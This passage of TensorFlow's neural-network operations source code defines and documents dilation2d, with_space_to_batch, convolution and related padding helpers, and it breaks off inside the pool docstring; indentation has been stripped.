kernel size and contains all zeros.
Note on duality: The dilation of `input` by the `filters` is equal to the
negation of the erosion of `-input` by the reflected `filters`.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`,
`int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`,
`uint32`, `uint64`.
4-D with shape `[batch, in_height, in_width, depth]`.
filters: A `Tensor`. Must have the same type as `input`.
3-D with shape `[filter_height, filter_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the input
tensor. Must be: `[1, stride_height, stride_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: A `string`, only `"NHWC"` is currently supported.
dilations: A list of `ints` that has length `>= 4`.
The input stride for atrous morphological dilation. Must be:
`[1, rate_height, rate_width, 1]`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
if data_format != "NHWC":
raise ValueError("Data formats other than NHWC are not yet supported")
return gen_nn_ops.dilation2d(input=input,
filter=filters,
strides=strides,
rates=dilations,
padding=padding,
name=name)
@tf_export(v1=["nn.dilation2d"])
@dispatch.add_dispatch_support
def dilation2d_v1( # pylint: disable=missing-docstring
input, # pylint: disable=redefined-builtin
filter=None, # pylint: disable=redefined-builtin
strides=None,
rates=None,
padding=None,
name=None,
filters=None,
dilations=None):
filter = deprecated_argument_lookup("filters", filters, "filter", filter)
rates = deprecated_argument_lookup("dilations", dilations, "rates", rates)
return gen_nn_ops.dilation2d(input, filter, strides, rates, padding, name)
dilation2d_v1.__doc__ = gen_nn_ops.dilation2d.__doc__
@tf_export("nn.with_space_to_batch")
@dispatch.add_dispatch_support
def with_space_to_batch(
input, # pylint: disable=redefined-builtin
dilation_rate,
padding,
op,
filter_shape=None,
spatial_dims=None,
data_format=None):
"""Performs `op` on the space-to-batch representation of `input`.
This has the effect of transforming sliding window operations into the
corresponding "atrous" operation in which the input is sampled at the
specified `dilation_rate`.
In the special case that `dilation_rate` is uniformly 1, this simply returns:
op(input, num_spatial_dims, padding)
Otherwise, it returns:
batch_to_space_nd(
op(space_to_batch_nd(input, adjusted_dilation_rate, adjusted_paddings),
num_spatial_dims,
"VALID")
adjusted_dilation_rate,
adjusted_crops),
where:
adjusted_dilation_rate is an int64 tensor of shape [max(spatial_dims)],
adjusted_{paddings,crops} are int64 tensors of shape [max(spatial_dims), 2]
defined as follows:
We first define two int64 tensors `paddings` and `crops` of shape
`[num_spatial_dims, 2]` based on the value of `padding` and the spatial
dimensions of the `input`:
If `padding = "VALID"`, then:
paddings, crops = required_space_to_batch_paddings(
input_shape[spatial_dims],
dilation_rate)
If `padding = "SAME"`, then:
dilated_filter_shape =
filter_shape + (filter_shape - 1) * (dilation_rate - 1)
paddings, crops = required_space_to_batch_paddings(
input_shape[spatial_dims],
dilation_rate,
[(dilated_filter_shape - 1) // 2,
dilated_filter_shape - 1 - (dilated_filter_shape - 1) // 2])
Because `space_to_batch_nd` and `batch_to_space_nd` assume that the spatial
dimensions are contiguous starting at the second dimension, but the specified
`spatial_dims` may not be, we must adjust `dilation_rate`, `paddings` and
`crops` in order to be usable with these operations. For a given dimension,
if the block size is 1, and both the starting and ending padding and crop
amounts are 0, then space_to_batch_nd effectively leaves that dimension alone,
which is what is needed for dimensions not part of `spatial_dims`.
Furthermore, `space_to_batch_nd` and `batch_to_space_nd` handle this case
efficiently for any number of leading and trailing dimensions.
For 0 <= i < len(spatial_dims), we assign:
adjusted_dilation_rate[spatial_dims[i] - 1] = dilation_rate[i]
adjusted_paddings[spatial_dims[i] - 1, :] = paddings[i, :]
adjusted_crops[spatial_dims[i] - 1, :] = crops[i, :]
All unassigned values of `adjusted_dilation_rate` default to 1, while all
unassigned values of `adjusted_paddings` and `adjusted_crops` default to 0.
Note in the case that `dilation_rate` is not uniformly 1, specifying "VALID"
padding is equivalent to specifying `padding = "SAME"` with a filter_shape of
`[1]*N`.
Advanced usage. Note the following optimization: A sequence of
`with_space_to_batch` operations with identical (not uniformly 1)
`dilation_rate` parameters and "VALID" padding
net = with_space_to_batch(net, dilation_rate, "VALID", op_1)
...
net = with_space_to_batch(net, dilation_rate, "VALID", op_k)
can be combined into a single `with_space_to_batch` operation as follows:
def combined_op(converted_input, num_spatial_dims, _):
result = op_1(converted_input, num_spatial_dims, "VALID")
...
result = op_k(result, num_spatial_dims, "VALID")
net = with_space_to_batch(net, dilation_rate, "VALID", combined_op)
This eliminates the overhead of `k-1` calls to `space_to_batch_nd` and
`batch_to_space_nd`.
Similarly, a sequence of `with_space_to_batch` operations with identical (not
uniformly 1) `dilation_rate` parameters, "SAME" padding, and odd filter
dimensions
net = with_space_to_batch(net, dilation_rate, "SAME", op_1, filter_shape_1)
...
net = with_space_to_batch(net, dilation_rate, "SAME", op_k, filter_shape_k)
can be combined into a single `with_space_to_batch` operation as follows:
def combined_op(converted_input, num_spatial_dims, _):
result = op_1(converted_input, num_spatial_dims, "SAME")
...
result = op_k(result, num_spatial_dims, "SAME")
net = with_space_to_batch(net, dilation_rate, "VALID", combined_op)
Args:
input: Tensor of rank > max(spatial_dims).
dilation_rate: int32 Tensor of *known* shape [num_spatial_dims].
padding: str constant equal to "VALID" or "SAME"
op: Function that maps (input, num_spatial_dims, padding) -> output
filter_shape: If padding = "SAME", specifies the shape of the convolution
kernel/pooling window as an integer Tensor of shape [>=num_spatial_dims].
If padding = "VALID", filter_shape is ignored and need not be specified.
spatial_dims: Monotonically increasing sequence of `num_spatial_dims`
integers (which are >= 1) specifying the spatial dimensions of `input`
and output. Defaults to: `range(1, num_spatial_dims+1)`.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
Returns:
The output Tensor as described above, dimensions will vary based on the op
provided.
Raises:
ValueError: if `padding` is invalid or the arguments are incompatible.
ValueError: if `spatial_dims` are invalid.
"""
input = ops.convert_to_tensor(input, name="input") # pylint: disable=redefined-builtin
input_shape = input.shape
def build_op(num_spatial_dims, padding):
return lambda inp, _: op(inp, num_spatial_dims, padding)
new_op = _WithSpaceToBatch(
input_shape,
dilation_rate,
padding,
build_op,
filter_shape=filter_shape,
spatial_dims=spatial_dims,
data_format=data_format)
return new_op(input, None)
class _WithSpaceToBatch(object):
"""Helper class for with_space_to_batch.
Note that this class assumes that shapes of input and filter passed to
`__call__` are compatible with `input_shape`, `filter_shape`, and
`spatial_dims` passed to the constructor.
Arguments
input_shape: static shape of input. i.e. input.shape.
dilation_rate: see `with_space_to_batch`.
padding: see `with_space_to_batch`.
build_op: Function that maps (num_spatial_dims, paddings) -> (function that
maps (input, filter) -> output).
filter_shape: see `with_space_to_batch`.
spatial_dims: `see with_space_to_batch`.
data_format: see `with_space_to_batch`.
num_batch_dims: (Optional). Number of batch dims in `input_shape`.
"""
def __init__(self,
input_shape,
dilation_rate,
padding,
build_op,
filter_shape=None,
spatial_dims=None,
data_format=None,
num_batch_dims=1):
"""Helper class for _with_space_to_batch."""
dilation_rate = ops.convert_to_tensor(
dilation_rate, dtypes.int32, name="dilation_rate")
if dilation_rate.shape.ndims not in (None, 1):
raise ValueError(
"rate must be rank 1 but saw {}".format(dilation_rate.shape.ndims))
if not dilation_rate.shape.is_fully_defined():
raise ValueError("rate must have known shape, but saw {}"
.format(dilation_rate.shape))
num_spatial_dims = dilation_rate.shape.dims[0].value
if data_format is not None and data_format.startswith("NC"):
starting_spatial_dim = num_batch_dims + 1
else:
starting_spatial_dim = num_batch_dims
if spatial_dims is None:
spatial_dims = range(starting_spatial_dim,
num_spatial_dims + starting_spatial_dim)
orig_spatial_dims = list(spatial_dims)
spatial_dims = sorted(set(int(x) for x in orig_spatial_dims))
if spatial_dims != orig_spatial_dims or any(x < 1 for x in spatial_dims):
raise ValueError(
"spatial_dims must be a monotonically increasing sequence of "
"positive integers, but saw: {}".format(orig_spatial_dims))
if data_format is not None and data_format.startswith("NC"):
expected_input_rank = spatial_dims[-1]
else:
expected_input_rank = spatial_dims[-1] + 1
try:
input_shape.with_rank_at_least(expected_input_rank)
except ValueError:
raise ValueError(
"input tensor must have rank at least {}, but saw rank {}"
.format(expected_input_rank, input_shape.ndims))
const_rate = tensor_util.constant_value(dilation_rate)
rate_or_const_rate = dilation_rate
if const_rate is not None:
rate_or_const_rate = const_rate
if np.any(const_rate < 1):
raise ValueError("dilation_rate must be positive, but saw: {}"
.format(const_rate))
if np.all(const_rate == 1):
self.call = build_op(num_spatial_dims, padding)
return
padding, explicit_paddings = convert_padding(padding)
# We have two padding contributions. The first is used for converting "SAME"
# to "VALID". The second is required so that the height and width of the
# zero-padded value tensor are multiples of rate.
# Padding required to reduce to "VALID" convolution
if padding == "SAME":
if filter_shape is None:
raise ValueError("filter_shape must be specified for SAME padding")
filter_shape = ops.convert_to_tensor(filter_shape, name="filter_shape")
const_filter_shape = tensor_util.constant_value(filter_shape)
if const_filter_shape is not None:
filter_shape = const_filter_shape
self.base_paddings = _with_space_to_batch_base_paddings(
const_filter_shape, num_spatial_dims, rate_or_const_rate)
else:
self.num_spatial_dims = num_spatial_dims
self.rate_or_const_rate = rate_or_const_rate
self.base_paddings = None
elif padding == "VALID":
self.base_paddings = np.zeros([num_spatial_dims, 2], np.int32)
elif padding == "EXPLICIT":
base_paddings = (np.array(explicit_paddings)
.reshape([num_spatial_dims + 2, 2]))
# Remove batch and channel dimensions
if data_format is not None and data_format.startswith("NC"):
self.base_paddings = base_paddings[2:]
else:
self.base_paddings = base_paddings[1:-1]
else:
raise ValueError("Invalid padding method %r" % padding)
self.input_shape = input_shape
self.spatial_dims = spatial_dims
self.dilation_rate = dilation_rate
self.data_format = data_format
self.op = build_op(num_spatial_dims, "VALID")
self.call = self._with_space_to_batch_call
def _with_space_to_batch_call(self, inp, filter): # pylint: disable=redefined-builtin
"""Call functionality for with_space_to_batch."""
# Handle input whose shape is unknown during graph creation.
input_spatial_shape = None
input_shape = self.input_shape
spatial_dims = self.spatial_dims
if input_shape.ndims is not None:
input_shape_list = input_shape.as_list()
input_spatial_shape = [input_shape_list[i] for i in spatial_dims]
if input_spatial_shape is None or None in input_spatial_shape:
input_shape_tensor = array_ops.shape(inp)
input_spatial_shape = array_ops.stack(
[input_shape_tensor[i] for i in spatial_dims])
base_paddings = self.base_paddings
if base_paddings is None:
# base_paddings could not be computed at build time since static filter
# shape was not fully defined.
filter_shape = array_ops.shape(filter)
base_paddings = _with_space_to_batch_base_paddings(
filter_shape, self.num_spatial_dims, self.rate_or_const_rate)
paddings, crops = array_ops.required_space_to_batch_paddings(
input_shape=input_spatial_shape,
base_paddings=base_paddings,
block_shape=self.dilation_rate)
dilation_rate = _with_space_to_batch_adjust(self.dilation_rate, 1,
spatial_dims)
paddings = _with_space_to_batch_adjust(paddings, 0, spatial_dims)
crops = _with_space_to_batch_adjust(crops, 0, spatial_dims)
input_converted = array_ops.space_to_batch_nd(
input=inp, block_shape=dilation_rate, paddings=paddings)
result = self.op(input_converted, filter)
result_converted = array_ops.batch_to_space_nd(
input=result, block_shape=dilation_rate, crops=crops)
# Recover channel information for output shape if channels are not last.
if self.data_format is not None and self.data_format.startswith("NC"):
if not result_converted.shape.dims[1].value and filter is not None:
output_shape = result_converted.shape.as_list()
output_shape[1] = filter.shape[-1]
result_converted.set_shape(output_shape)
return result_converted
def __call__(self, inp, filter): # pylint: disable=redefined-builtin
return self.call(inp, filter)
def _with_space_to_batch_base_paddings(filter_shape, num_spatial_dims,
rate_or_const_rate):
"""Helper function to compute base_paddings."""
# Spatial dimensions of the filters and the upsampled filters in which we
# introduce (rate - 1) zeros between consecutive filter values.
filter_spatial_shape = filter_shape[:num_spatial_dims]
pad_extra_shape = (filter_spatial_shape - 1) * rate_or_const_rate
# When full_padding_shape is odd, we pad more at end, following the same
# convention as conv2d.
pad_extra_start = pad_extra_shape // 2
pad_extra_end = pad_extra_shape - pad_extra_start
base_paddings = array_ops.stack(
[[pad_extra_start[i], pad_extra_end[i]] for i in range(num_spatial_dims)])
return base_paddings
def _with_space_to_batch_adjust(orig, fill_value, spatial_dims):
"""Returns an `adjusted` version of `orig` based on `spatial_dims`.
Tensor of the same type as `orig` and with shape
`[max(spatial_dims), ...]` where:
adjusted[spatial_dims[i] - 1, ...] = orig[i, ...]
for 0 <= i < len(spatial_dims), and
adjusted[j, ...] = fill_value
for j != spatial_dims[i] - 1 for some i.
If `orig` is a constant value, then the result will be a constant value.
Args:
orig: Tensor of rank > max(spatial_dims).
fill_value: Numpy scalar (of same data type as `orig) specifying the fill
value for non-spatial dimensions.
spatial_dims: See with_space_to_batch.
Returns:
`adjusted` tensor.
"""
fill_dims = orig.get_shape().as_list()[1:]
dtype = orig.dtype.as_numpy_dtype
parts = []
const_orig = tensor_util.constant_value(orig)
const_or_orig = const_orig if const_orig is not None else orig
prev_spatial_dim = 0
i = 0
while i < len(spatial_dims):
start_i = i
start_spatial_dim = spatial_dims[i]
if start_spatial_dim > 1:
# Fill in any gap from the previous spatial dimension (or dimension 1 if
# this is the first spatial dimension) with `fill_value`.
parts.append(
np.full(
[start_spatial_dim - 1 - prev_spatial_dim] + fill_dims,
fill_value,
dtype=dtype))
# Find the largest value of i such that:
# [spatial_dims[start_i], ..., spatial_dims[i]]
# == [start_spatial_dim, ..., start_spatial_dim + i - start_i],
# i.e. the end of a contiguous group of spatial dimensions.
while (i + 1 < len(spatial_dims) and
spatial_dims[i + 1] == spatial_dims[i] + 1):
i += 1
parts.append(const_or_orig[start_i:i + 1])
prev_spatial_dim = spatial_dims[i]
i += 1
if const_orig is not None:
return np.concatenate(parts)
else:
return array_ops.concat(parts, 0)
def _get_strides_and_dilation_rate(num_spatial_dims, strides, dilation_rate):
"""Helper function for verifying strides and dilation_rate arguments.
This is used by `convolution` and `pool`.
Args:
num_spatial_dims: int
strides: Optional. List of N ints >= 1. Defaults to [1]*N. If any value
of strides is > 1, then all values of dilation_rate must be 1.
dilation_rate: Optional. List of N ints >= 1. Defaults to [1]*N. If any
value of dilation_rate is > 1, then all values of strides must be 1.
Returns:
Normalized (strides, dilation_rate) as int32 numpy arrays of shape
[num_spatial_dims].
Raises:
ValueError: if the parameters are invalid.
"""
if dilation_rate is None:
dilation_rate = [1] * num_spatial_dims
elif len(dilation_rate) != num_spatial_dims:
raise ValueError("len(dilation_rate)=%d but should be %d" %
(len(dilation_rate), num_spatial_dims))
dilation_rate = np.array(dilation_rate, dtype=np.int32)
if np.any(dilation_rate < 1):
raise ValueError("all values of dilation_rate must be positive")
if strides is None:
strides = [1] * num_spatial_dims
elif len(strides) != num_spatial_dims:
raise ValueError("len(strides)=%d but should be %d" % (len(strides),
num_spatial_dims))
strides = np.array(strides, dtype=np.int32)
if np.any(strides < 1):
raise ValueError("all values of strides must be positive")
if np.any(strides > 1) and np.any(dilation_rate > 1):
raise ValueError(
"strides > 1 not supported in conjunction with dilation_rate > 1")
return strides, dilation_rate
@tf_export(v1=["nn.convolution"])
@dispatch.add_dispatch_support
def convolution(
input, # pylint: disable=redefined-builtin
filter, # pylint: disable=redefined-builtin
padding,
strides=None,
dilation_rate=None,
name=None,
data_format=None,
filters=None,
dilations=None): # pylint: disable=g-doc-args
"""Computes sums of N-D convolutions (actually cross-correlation).
This also supports either output striding via the optional `strides` parameter
or atrous convolution (also known as convolution with holes or dilated
convolution, based on the French word "trous" meaning holes in English) via
the optional `dilation_rate` parameter. Currently, however, output striding
is not supported for atrous convolutions.
Specifically, in the case that `data_format` does not start with "NC", given
a rank (N+2) `input` Tensor of shape
[num_batches,
input_spatial_shape[0],
...,
input_spatial_shape[N-1],
num_input_channels],
a rank (N+2) `filter` Tensor of shape
[spatial_filter_shape[0],
...,
spatial_filter_shape[N-1],
num_input_channels,
num_output_channels],
an optional `dilation_rate` tensor of shape [N] (defaulting to [1]*N)
specifying the filter upsampling/input downsampling rate, and an optional list
of N `strides` (defaulting [1]*N), this computes for each N-D spatial output
position (x[0], ..., x[N-1]):
```
output[b, x[0], ..., x[N-1], k] =
sum_{z[0], ..., z[N-1], q}
filter[z[0], ..., z[N-1], q, k] *
padded_input[b,
x[0]*strides[0] + dilation_rate[0]*z[0],
...,
x[N-1]*strides[N-1] + dilation_rate[N-1]*z[N-1],
q]
```
where b is the index into the batch, k is the output channel number, q is the
input channel number, and z is the N-D spatial offset within the filter. Here,
`padded_input` is obtained by zero padding the input using an effective
spatial filter shape of `(spatial_filter_shape-1) * dilation_rate + 1` and
output striding `strides`.
In the case that `data_format` does start with `"NC"`, the `input` and output
(but not the `filter`) are simply transposed as follows:
convolution(input, data_format, **kwargs) =
tf.transpose(convolution(tf.transpose(input, [0] + range(2,N+2) + [1]),
**kwargs),
[0, N+1] + range(1, N+1))
It is required that 1 <= N <= 3.
Args:
input: An (N+2)-D `Tensor` of type `T`, of shape
`[batch_size] + input_spatial_shape + [in_channels]` if data_format does
not start with "NC" (default), or
`[batch_size, in_channels] + input_spatial_shape` if data_format starts
with "NC".
filter: An (N+2)-D `Tensor` with the same type as `input` and shape
`spatial_filter_shape + [in_channels, out_channels]`.
padding: A string, either `"VALID"` or `"SAME"`. The padding algorithm.
`"valid"` means no padding. `"same"` results in padding evenly to
the left/right or up/down of the input such that output has the same
height/width dimension as the input.
strides: Optional. Sequence of N ints >= 1. Specifies the output stride.
Defaults to [1]*N. If any value of strides is > 1, then all values of
dilation_rate must be 1.
dilation_rate: Optional. Sequence of N ints >= 1. Specifies the filter
upsampling/input downsampling rate. In the literature, the same parameter
is sometimes called `input stride` or `dilation`. The effective filter
size used for the convolution will be `spatial_filter_shape +
(spatial_filter_shape - 1) * (rate - 1)`, obtained by inserting
(dilation_rate[i]-1) zeros between consecutive elements of the original
filter in each spatial dimension i. If any value of dilation_rate is > 1,
then all values of strides must be 1.
name: Optional name for the returned tensor.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
Returns:
A `Tensor` with the same type as `input` of shape
`[batch_size] + output_spatial_shape + [out_channels]`
if data_format is None or does not start with "NC", or
`[batch_size, out_channels] + output_spatial_shape`
if data_format starts with "NC",
where `output_spatial_shape` depends on the value of `padding`.
If padding == "SAME":
output_spatial_shape[i] = ceil(input_spatial_shape[i] / strides[i])
If padding == "VALID":
output_spatial_shape[i] =
ceil((input_spatial_shape[i] -
(spatial_filter_shape[i]-1) * dilation_rate[i])
/ strides[i]).
Raises:
ValueError: If input/output depth does not match `filter` shape, if padding
is other than `"VALID"` or `"SAME"`, or if data_format is invalid.
"""
filter = deprecated_argument_lookup("filters", filters, "filter", filter)
dilation_rate = deprecated_argument_lookup(
"dilations", dilations, "dilation_rate", dilation_rate)
return convolution_internal(
input,
filter,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilation_rate,
name=name)
@tf_export("nn.convolution", v1=[])
@dispatch.add_dispatch_support
def convolution_v2( # pylint: disable=missing-docstring
input, # pylint: disable=redefined-builtin
filters,
strides=None,
padding="VALID",
data_format=None,
dilations=None,
name=None):
return convolution_internal(
input, # pylint: disable=redefined-builtin
filters,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
convolution_v2.__doc__ = deprecation.rewrite_argument_docstring(
deprecation.rewrite_argument_docstring(
convolution.__doc__, "dilation_rate", "dilations"),
"filter", "filters")
def convolution_internal(
input, # pylint: disable=redefined-builtin
filters,
strides=None,
padding="VALID",
data_format=None,
dilations=None,
name=None,
call_from_convolution=True,
num_spatial_dims=None):
"""Internal function which performs rank agnostic convolution.
Args:
input: See `convolution`.
filters: See `convolution`.
strides: See `convolution`.
padding: See `convolution`.
data_format: See `convolution`.
dilations: See `convolution`.
name: See `convolution`.
call_from_convolution: See `convolution`.
num_spatial_dims: (Optional.). It is a integer describing the
rank of the spatial dimensions. For `1-D`, `2-D` and `3-D` convolutions,
the value of `num_spatial_dims` is `1`, `2`, and `3`, respectively.
This argument is only required to disambiguate the rank of `batch_shape`
when `filter_shape.ndims is None` and `len(batch_shape) > 1`. For
backwards compatibility, if `num_spatial_dims is None` and
`filter_shape.ndims is None`, then `len(batch_shape)` is assumed to be
`1` (i.e., the input is expected to be
`[batch_size, num_channels] + input_spatial_shape`
or `[batch_size] + input_spatial_shape + [num_channels]`.
Returns:
A tensor of shape and dtype matching that of `input`.
Raises:
ValueError: If input and filter both have unknown shapes, or if
`num_spatial_dims` is provided and incompatible with the value
estimated from `filters.shape`.
"""
if (not isinstance(filters, variables_lib.Variable) and
not tensor_util.is_tf_type(filters)):
with ops.name_scope("convolution_internal", None, [filters, input]):
filters = ops.convert_to_tensor(filters, name='filters')
if (not isinstance(input, ops.Tensor) and not tensor_util.is_tf_type(input)):
with ops.name_scope("convolution_internal", None, [filters, input]):
input = ops.convert_to_tensor(input, name="input")
filters_rank = filters.shape.rank
inputs_rank = input.shape.rank
if num_spatial_dims is None:
if filters_rank:
num_spatial_dims = filters_rank - 2
elif inputs_rank:
num_spatial_dims = inputs_rank - 2
else:
raise ValueError("rank of input or filter must be known")
elif filters_rank and filters_rank - 2 != num_spatial_dims:
raise ValueError(
"inconsistent estimate of spatial dims ({}) vs. actual passed "
"num_spatial_dims ({}). n was estimated as len(filters.shape) - 2, "
"but filters shape is: {}".format(filters_rank, num_spatial_dims,
filters.shape))
if inputs_rank:
num_batch_dims = inputs_rank - num_spatial_dims - 1 # Channel dimension.
else:
num_batch_dims = 1 # By default, assume single batch dimension.
if num_spatial_dims not in {1, 2, 3}:
raise ValueError(
"num_spatial_dims (input.shape.ndims - num_batch_dims - 1) must be one "
"of 1, 2 or 3 but saw {}. num_batch_dims: {}.".format(
num_spatial_dims, num_batch_dims))
if data_format is None or data_format in _CHANNELS_LAST_FORMATS:
channel_index = num_batch_dims + num_spatial_dims
else:
channel_index = num_batch_dims
if dilations is None:
dilations = _get_sequence(dilations, num_spatial_dims, channel_index,
"dilations")
is_dilated_conv = False
else:
dilations = _get_sequence(dilations, num_spatial_dims, channel_index,
"dilations")
is_dilated_conv = any(i != 1 for i in dilations)
strides = _get_sequence(strides, num_spatial_dims, channel_index, "strides")
has_tpu_context = device_context.enclosing_tpu_context() is not None
if name:
default_name = None
elif not has_tpu_context or call_from_convolution:
default_name = "convolution"
elif num_spatial_dims == 2: # Most common case.
default_name = "Conv2D"
elif num_spatial_dims == 3:
default_name = "Conv3D"
else:
default_name = "conv1d"
with ops.name_scope(name, default_name, [input, filters]) as name:
# Fast path for TPU or if no dilation, as gradient only supported on TPU
# for dilations.
if not is_dilated_conv or has_tpu_context:
if num_spatial_dims == 2: # Most common case.
op = _conv2d_expanded_batch
elif num_spatial_dims == 3:
op = _conv3d_expanded_batch
else:
op = conv1d
return op(
input,
filters,
strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
else:
if channel_index == 1:
strides = strides[2:]
dilations = dilations[2:]
else:
strides = strides[1:-1]
dilations = dilations[1:-1]
op = Convolution(
tensor_shape.as_shape(input.shape),
tensor_shape.as_shape(filters.shape),
padding,
strides=strides,
dilation_rate=dilations,
name=name,
data_format=data_format,
num_spatial_dims=num_spatial_dims)
return op(input, filters)
class Convolution(object):
"""Helper class for convolution.
Note that this class assumes that shapes of input and filter passed to
`__call__` are compatible with `input_shape`, `filter_shape`, and
`num_spatial_dims` passed to the constructor.
Arguments
input_shape: static shape of input. i.e. input.shape. Its length is
`batch_shape + input_spatial_shape + [num_channels]` if `data_format`
does not start with `NC`, or
`batch_shape + [num_channels] + input_spatial_shape` if `data_format`
starts with `NC`.
filter_shape: static shape of the filter. i.e. filter.shape.
padding: The padding algorithm, must be "SAME" or "VALID".
strides: see convolution.
dilation_rate: see convolution.
name: see convolution.
data_format: A string or `None`. Specifies whether the channel dimension of
the `input` and output is the last dimension (if `data_format` is `None`
or does not start with `NC`), or the first post-batch dimension (i.e. if
`data_format` starts with `NC`).
num_spatial_dims: (Usually optional.) Python integer, the rank of the
spatial and channel dimensions. For `1-D`, `2-D` and `3-D` convolutions,
the value of `num_spatial_dims` is `1`, `2`, and `3`, respectively.
This argument is only required to disambiguate the rank of `batch_shape`
when `filter_shape.ndims is None` and `len(batch_shape) > 1`. For
backwards compatibility, if `num_spatial_dims is None` and
`filter_shape.ndims is None`, then `len(batch_shape)` is assumed to be
`1` (i.e., the input is expected to be
`[batch_size, num_channels] + input_spatial_shape`
or `[batch_size] + input_spatial_shape + [num_channels]`.
"""
def __init__(self,
input_shape,
filter_shape,
padding,
strides=None,
dilation_rate=None,
name=None,
data_format=None,
num_spatial_dims=None):
"""Helper function for convolution."""
num_batch_dims = None
filter_shape = tensor_shape.as_shape(filter_shape)
input_shape = tensor_shape.as_shape(input_shape)
if filter_shape.ndims is not None:
if (num_spatial_dims is not None and
filter_shape.ndims != num_spatial_dims + 2):
raise ValueError(
"Expected filter_shape.ndims == num_spatial_dims + 2, "
"but saw filter_shape.ndims == {} and num_spatial_dims == {}"
.format(filter_shape.ndims, num_spatial_dims))
else:
num_spatial_dims = filter_shape.ndims - 2
if input_shape.ndims is not None and num_spatial_dims is not None:
num_batch_dims = input_shape.ndims - num_spatial_dims - 1
if num_spatial_dims is None:
num_spatial_dims = input_shape.ndims - 2
else:
if input_shape.ndims is not None:
if input_shape.ndims < num_spatial_dims + 2:
raise ValueError(
"Expected input_shape.ndims >= num_spatial_dims + 2, but saw "
"input_shape.ndims == {} and num_spatial_dims == {}"
.format(input_shape.ndims, num_spatial_dims))
else:
if num_batch_dims is None:
num_batch_dims = input_shape.ndims - num_spatial_dims - 1
if num_spatial_dims is None:
raise ValueError(
"Cannot estimate num_spatial_dims since input_shape.ndims is None, "
"filter_shape.ndims is None, and argument num_spatial_dims is also "
"None.")
if num_batch_dims is None:
num_batch_dims = 1
if num_batch_dims < 1:
raise ValueError(
"num_batch_dims should be >= 1, but saw {}. num_batch_dims was "
"estimated as `input_shape.ndims - num_spatial_dims - 1` and "
"num_spatial_dims was either provided or estimated as "
"`filter_shape.ndims - 2`. input_shape.ndims: {}, "
"num_spatial_dims: {}, filter_shape.ndims: {}"
.format(num_batch_dims, input_shape.ndims, num_spatial_dims,
filter_shape.ndims))
if data_format is None or not data_format.startswith("NC"):
input_channels_dim = tensor_shape.dimension_at_index(
input_shape, num_spatial_dims + num_batch_dims)
spatial_dims = range(num_batch_dims, num_spatial_dims + num_batch_dims)
else:
input_channels_dim = tensor_shape.dimension_at_index(
input_shape, num_batch_dims)
spatial_dims = range(
num_batch_dims + 1, num_spatial_dims + num_batch_dims + 1)
filter_dim = tensor_shape.dimension_at_index(filter_shape, num_spatial_dims)
if not (input_channels_dim % filter_dim).is_compatible_with(0):
raise ValueError("The number of input channels is not divisible by the "
"corresponding number of output filters. Received: "
"input channels={}, output filters={}".format(
input_channels_dim, filter_dim))
strides, dilation_rate = _get_strides_and_dilation_rate(
num_spatial_dims, strides, dilation_rate)
self.input_shape = input_shape
self.filter_shape = filter_shape
self.data_format = data_format
self.strides = strides
self.padding = padding
self.name = name
self.dilation_rate = dilation_rate
self.num_batch_dims = num_batch_dims
self.num_spatial_dims = num_spatial_dims
self.conv_op = _WithSpaceToBatch(
input_shape,
dilation_rate=dilation_rate,
padding=padding,
build_op=self._build_op,
filter_shape=filter_shape,
spatial_dims=spatial_dims,
data_format=data_format,
num_batch_dims=num_batch_dims)
def _build_op(self, _, padding):
return _NonAtrousConvolution(
self.input_shape,
filter_shape=self.filter_shape,
padding=padding,
data_format=self.data_format,
strides=self.strides,
name=self.name,
num_batch_dims=self.num_batch_dims)
def __call__(self, inp, filter): # pylint: disable=redefined-builtin
# TPU convolution supports dilations greater than 1.
if device_context.enclosing_tpu_context() is not None:
return convolution_internal(
inp,
filter,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilations=self.dilation_rate,
name=self.name,
call_from_convolution=False,
num_spatial_dims=self.num_spatial_dims)
else:
return self.conv_op(inp, filter)
@tf_export(v1=["nn.pool"])
@dispatch.add_dispatch_support
def pool(
input, # pylint: disable=redefined-builtin
window_shape,
pooling_type,
padding,
dilation_rate=None,
strides=None,
name=None,
data_format=None,
dilations=None):
"""Performs an N-D pooling operation.
In the case that `data_format` does not start with "NC", computes for
0 <= b < batch_size,
0 <= x[i] < output_spatial_shape[i],
0 <= c < num_channels:
```
output[b, x[0], ..., x[N-1], c] =
REDUCE_{z[0], ..., z[N-1]}
input[b,
x[0] * strides[0] - pad_before[0] + dilation_rate[0]*z[0],
...
x[N-1]*strides[N-1] - pad_before[N-1] + dilation_rate[N-1]*z[N-1],
c],
```
where the reduction function REDUCE depends on the value of `pooling_type`,
and pad_before is defined based on the value of `padding` as described in
the "returns" section of `tf.nn.convolution` for details.
The reduction never includes out-of-bounds positions.
In the case that `data_format` starts with `"NC"`, the `input` and output are
simply transposed as follows:
```
pool(input, data_format, **kwargs) =
tf.transpose(pool(tf.transpose(input, [0] + range(2,N+2) + [1]),
**kwargs),
[0, N+1] + range(1, N+1))
```
Args:
input: Tensor of rank N+2, of shape
`[batch_size] + input_spatial_shape + [num_channels]` if data_format does
not start with "NC" (default), or
`[batch_size, num_channels] + input_spatial_shape` if data_format starts
with "NC". Pooling happens over the spatial dimensions only.
window_shape: Sequence of N ints >= 1.
pooling_type: Specifies pooling operation, must be "AVG" or "MAX".
padding: The padding algorithm, must be "SAME" or "VALID".
See the "returns" section of `tf.nn.convolution` for details.
